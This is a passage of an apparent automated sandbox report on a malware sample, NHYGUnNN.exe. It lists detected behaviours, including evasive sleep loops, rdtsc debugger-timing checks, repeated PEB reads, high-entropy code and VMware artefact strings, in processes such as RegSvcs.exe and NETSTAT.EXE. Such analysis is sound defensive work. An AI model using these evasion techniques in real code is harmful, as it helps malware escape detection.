Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BC423B push ds; iretd 10_2_00BC4250
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDFA1C push eax; ret 10_2_00BDFA22
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BC4212 push ds; iretd 10_2_00BC4250
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BC4254 push 793A76E7h; ret 10_2_00BC425C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BD5B99 push edx; retf 10_2_00BD5B9F
Source: initial sample Static PE information: section name: .text entropy: 7.879743437690199
Source: C:\Users\user\Desktop\NHYGUnNN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NHYGUnNN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NHYGUnNN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NHYGUnNN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NHYGUnNN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NHYGUnNN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NHYGUnNN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NHYGUnNN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NHYGUnNN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NHYGUnNN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NHYGUnNN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\NHYGUnNN.exe TID: 5188 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4760 Thread sleep time: -36000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C5BA5 rdtsc 1_2_013C5BA5
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\NHYGUnNN.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 6.1 %
Source: C:\Windows\SysWOW64\NETSTAT.EXE API coverage: 9.6 %
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BD2CA0 FindFirstFileW,FindNextFileW,FindClose, 10_2_00BD2CA0
Source: C:\Users\user\Desktop\NHYGUnNN.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: NHYGUnNN.exe, 00000000.00000002.240647032.0000012A3AB7D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %AtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/l%phMpl%3Ts+
Source: NHYGUnNN.exe, 00000000.00000002.239226226.0000012A39A02000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/
Source: explorer.exe, 00000002.00000000.296608102.00000000045B0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.303615769.00000000081DD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
Source: explorer.exe, 00000002.00000000.279110893.0000000006710000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: explorer.exe, 00000002.00000000.282562714.00000000082B2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Prod_VMware_SATAi
Source: NHYGUnNN.exe, 00000000.00000002.240917397.0000012A3ABFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %AtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/VphMpV3Ts+
Source: NHYGUnNN.exe, 00000000.00000002.241144747.0000012A3AC7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %C30PR9jBAtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/VphMpV3Ts+
Source: explorer.exe, 00000002.00000000.252879418.0000000008304000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: NHYGUnNN.exe, 00000000.00000002.240357022.0000012A3AAF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %AtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/l%phMpl%3
Source: NHYGUnNN.exe, 00000000.00000002.239851941.0000012A3AA71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %tZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/l%phMpl%3
Source: explorer.exe, 00000002.00000000.282562714.00000000082B2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000002.00000000.252366258.0000000008200000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C5BA5 rdtsc 1_2_013C5BA5
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132513A mov eax, dword ptr fs:[00000030h] 1_2_0132513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132513A mov eax, dword ptr fs:[00000030h] 1_2_0132513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01314120 mov eax, dword ptr fs:[00000030h] 1_2_01314120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01314120 mov eax, dword ptr fs:[00000030h] 1_2_01314120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01314120 mov eax, dword ptr fs:[00000030h] 1_2_01314120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01314120 mov eax, dword ptr fs:[00000030h] 1_2_01314120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01314120 mov ecx, dword ptr fs:[00000030h] 1_2_01314120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F9100 mov eax, dword ptr fs:[00000030h] 1_2_012F9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F9100 mov eax, dword ptr fs:[00000030h] 1_2_012F9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F9100 mov eax, dword ptr fs:[00000030h] 1_2_012F9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FC962 mov eax, dword ptr fs:[00000030h] 1_2_012FC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FB171 mov eax, dword ptr fs:[00000030h] 1_2_012FB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FB171 mov eax, dword ptr fs:[00000030h] 1_2_012FB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B944 mov eax, dword ptr fs:[00000030h] 1_2_0131B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B944 mov eax, dword ptr fs:[00000030h] 1_2_0131B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013751BE mov eax, dword ptr fs:[00000030h] 1_2_013751BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013751BE mov eax, dword ptr fs:[00000030h] 1_2_013751BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013751BE mov eax, dword ptr fs:[00000030h] 1_2_013751BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013751BE mov eax, dword ptr fs:[00000030h] 1_2_013751BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h] 1_2_013199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h] 1_2_013199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013199BF mov eax, dword ptr fs:[00000030h] 1_2_013199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h] 1_2_013199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h] 1_2_013199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013199BF mov eax, dword ptr fs:[00000030h] 1_2_013199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h] 1_2_013199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h] 1_2_013199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013199BF mov eax, dword ptr fs:[00000030h] 1_2_013199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h] 1_2_013199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h] 1_2_013199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013199BF mov eax, dword ptr fs:[00000030h] 1_2_013199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013769A6 mov eax, dword ptr fs:[00000030h] 1_2_013769A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013261A0 mov eax, dword ptr fs:[00000030h] 1_2_013261A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013261A0 mov eax, dword ptr fs:[00000030h] 1_2_013261A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B49A4 mov eax, dword ptr fs:[00000030h] 1_2_013B49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B49A4 mov eax, dword ptr fs:[00000030h] 1_2_013B49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B49A4 mov eax, dword ptr fs:[00000030h] 1_2_013B49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B49A4 mov eax, dword ptr fs:[00000030h] 1_2_013B49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01322990 mov eax, dword ptr fs:[00000030h] 1_2_01322990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131C182 mov eax, dword ptr fs:[00000030h] 1_2_0131C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132A185 mov eax, dword ptr fs:[00000030h] 1_2_0132A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FB1E1 mov eax, dword ptr fs:[00000030h] 1_2_012FB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FB1E1 mov eax, dword ptr fs:[00000030h] 1_2_012FB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FB1E1 mov eax, dword ptr fs:[00000030h] 1_2_012FB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013841E8 mov eax, dword ptr fs:[00000030h] 1_2_013841E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A830 mov eax, dword ptr fs:[00000030h] 1_2_0131A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A830 mov eax, dword ptr fs:[00000030h] 1_2_0131A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A830 mov eax, dword ptr fs:[00000030h] 1_2_0131A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A830 mov eax, dword ptr fs:[00000030h] 1_2_0131A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130B02A mov eax, dword ptr fs:[00000030h] 1_2_0130B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130B02A mov eax, dword ptr fs:[00000030h] 1_2_0130B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130B02A mov eax, dword ptr fs:[00000030h] 1_2_0130B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130B02A mov eax, dword ptr fs:[00000030h] 1_2_0130B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132002D mov eax, dword ptr fs:[00000030h] 1_2_0132002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132002D mov eax, dword ptr fs:[00000030h] 1_2_0132002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132002D mov eax, dword ptr fs:[00000030h] 1_2_0132002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132002D mov eax, dword ptr fs:[00000030h] 1_2_0132002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132002D mov eax, dword ptr fs:[00000030h] 1_2_0132002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01377016 mov eax, dword ptr fs:[00000030h] 1_2_01377016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01377016 mov eax, dword ptr fs:[00000030h] 1_2_01377016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01377016 mov eax, dword ptr fs:[00000030h] 1_2_01377016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C4015 mov eax, dword ptr fs:[00000030h] 1_2_013C4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C4015 mov eax, dword ptr fs:[00000030h] 1_2_013C4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B2073 mov eax, dword ptr fs:[00000030h] 1_2_013B2073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C1074 mov eax, dword ptr fs:[00000030h] 1_2_013C1074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01310050 mov eax, dword ptr fs:[00000030h] 1_2_01310050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01310050 mov eax, dword ptr fs:[00000030h] 1_2_01310050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132F0BF mov ecx, dword ptr fs:[00000030h] 1_2_0132F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132F0BF mov eax, dword ptr fs:[00000030h] 1_2_0132F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132F0BF mov eax, dword ptr fs:[00000030h] 1_2_0132F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h] 1_2_013220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h] 1_2_013220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h] 1_2_013220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h] 1_2_013220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h] 1_2_013220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h] 1_2_013220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013390AF mov eax, dword ptr fs:[00000030h] 1_2_013390AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F9080 mov eax, dword ptr fs:[00000030h] 1_2_012F9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01373884 mov eax, dword ptr fs:[00000030h] 1_2_01373884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01373884 mov eax, dword ptr fs:[00000030h] 1_2_01373884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F58EC mov eax, dword ptr fs:[00000030h] 1_2_012F58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F40E1 mov eax, dword ptr fs:[00000030h] 1_2_012F40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F40E1 mov eax, dword ptr fs:[00000030h] 1_2_012F40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F40E1 mov eax, dword ptr fs:[00000030h] 1_2_012F40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B8E4 mov eax, dword ptr fs:[00000030h] 1_2_0131B8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B8E4 mov eax, dword ptr fs:[00000030h] 1_2_0131B8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0138B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0138B8D0 mov ecx, dword ptr fs:[00000030h] 1_2_0138B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0138B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0138B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0138B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0138B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B131B mov eax, dword ptr fs:[00000030h] 1_2_013B131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01323B7A mov eax, dword ptr fs:[00000030h] 1_2_01323B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01323B7A mov eax, dword ptr fs:[00000030h] 1_2_01323B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FDB60 mov ecx, dword ptr fs:[00000030h] 1_2_012FDB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C8B58 mov eax, dword ptr fs:[00000030h] 1_2_013C8B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FDB40 mov eax, dword ptr fs:[00000030h] 1_2_012FDB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FF358 mov eax, dword ptr fs:[00000030h] 1_2_012FF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C5BA5 mov eax, dword ptr fs:[00000030h] 1_2_013C5BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01324BAD mov eax, dword ptr fs:[00000030h] 1_2_01324BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01324BAD mov eax, dword ptr fs:[00000030h] 1_2_01324BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01324BAD mov eax, dword ptr fs:[00000030h] 1_2_01324BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132B390 mov eax, dword ptr fs:[00000030h] 1_2_0132B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01322397 mov eax, dword ptr fs:[00000030h] 1_2_01322397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B138A mov eax, dword ptr fs:[00000030h] 1_2_013B138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132138B mov eax, dword ptr fs:[00000030h] 1_2_0132138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132138B mov eax, dword ptr fs:[00000030h] 1_2_0132138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132138B mov eax, dword ptr fs:[00000030h] 1_2_0132138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013AD380 mov ecx, dword ptr fs:[00000030h] 1_2_013AD380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01301B8F mov eax, dword ptr fs:[00000030h] 1_2_01301B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01301B8F mov eax, dword ptr fs:[00000030h] 1_2_01301B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h] 1_2_013203E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h] 1_2_013203E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h] 1_2_013203E2
